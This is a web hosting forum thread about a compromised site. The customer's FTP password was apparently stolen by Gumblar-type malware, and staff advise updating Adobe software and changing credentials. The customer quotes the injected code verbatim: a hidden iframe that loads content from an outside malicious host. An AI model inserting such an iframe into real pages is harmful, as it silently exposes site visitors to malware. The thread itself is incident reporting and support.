Site Hacked after one day

My site has been hacked after only one day on your servers. This is unacceptable.

This is the response I get:

Praveenp: Iframe insertion can occur due to code vulnerability.
Praveenp: Iframe injection, normally happens via SQL injection, cms editors with insecure uploaders, or remote include vulnerabilities
Praveenp: Whenever there is Iframe insertion, check your web and FTP logs
Paul: Are you trying to tell me this is my problem?
Praveenp: If you need web logs of your account kindly let us know, we will provide you the same. It will help you to find the source of insertion.​

You are telling me this is my issue? The iframe was inserted into the body of a page, it has NOTHING to do with SQL or my code.

I'm not very happy. My account name is the same as my forum name. Please sort this out. This has never happened to me anywhere else, and my local machine is firewalled and anti-virused. No one has access to this machine or my FTP.
 
Do you have a ticket?

I checked your files and found nothing, I need a timestamp to match it up and tell you anymore, with a timestamp we could tell you exactly how it happened.
 
I have opened a ticket - there is suspicious activity in the FTP logs from poland. My machine is firewalled and has AV running, therefore I have no idea how they obtained the username and password. I am 99.9% sure it was not from this machine (only machine ever used by me). All hosting accounts at the other hosts I use have not been compromised (Same CuteFTP used for all my hosting). Thanks for your help thus far.
 
p.s. I have already restored all files - the iframe code was:

<body><iframe src="http:// c9u.at :8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>

If you look at the FTP logs there should only ever be an IP from one geolocation (Here in SA) - it seems someone from Poland and Sweden logged in and edited files.
 
ex090816.log 30834 09:45:30 123.237.23.24 [682]created {removed} 426 995
ex090816.log 30753 09:44:45 89.215.17.239 [679]sent {removed} 226 0
ex090816.log 30786 09:45:01 82.79.225.215 [681]sent {removed} 226 0
ex090816.log 30875 09:45:56 217.209.169.85 [684]sent {removed} 226 0

These are a few of the culprits.
 
that doesn't mean much really, I need a TIMEstamp to tell you what/how without it I can't do much.

the first thing you should do is check that you have all adobe software updated to the latest versions:
http://support.jodohost.com/showthread.php?t=16921

I say this because, the FTP logs we sent clearly show that as the method, not a server issue or site code problem as the cause.

After you make sure Adobe apps are to the latest version, use the Hsphere CP and change the FTP password ASAP.
 
Yes I know and saw the logs.

This is exactly how the botnets that hit the gumblar worm stolen passwords works. i have posted a large logs like this in the past, trying to search it up.

ok found it, it is in a section you don't have access to right now, send me a request to go to the customer only forum (it is an announcement that should show at the top of each forum) and I will get you access, but basically it is a copy/paste of a log almost like yours just replace a bunch of IPs and filenames(for a real world example I just anonymized the client data)

I was just checking in here, I will be back around several times today and get you access one of those times. sorry this has happened, but it looks like something easily resolvable.
 
Thank you, you have been a great help. I apologise for seeming rude, but when I saw that I had to re-upload after only one day I was mad as hell.

Thanks again - you have been a star. I will update my Adobe but as far as I know it is said to auto update.
 
Thank you, you have been a great help. I apologise for seeming rude, but when I saw that I had to re-upload after only one day I was mad as hell.

Thanks again - you have been a star. I will update my Adobe but as far as I know it is said to auto update.

Paul,

No offense taken at all, we have been dealing with these issue for several months now, along with all other hosts.

FTP access to edit files is really a staple, it is something we would really take a lot of fire for turning off. And since they use valid info, it is a large problem.

There is a chance if you used the same login/pass at the previous host(if there was, I didn't look up domain info) that it was 'stolen' as much as months before, as I have seen several of the FTP password stolen by gumblar be quite delayed in any actions, and then others steal and immediately send the botnet hounds out.

if you lookup many of these IPs, you will see most of them are trojaned home PCs as well :(
 
Back
Top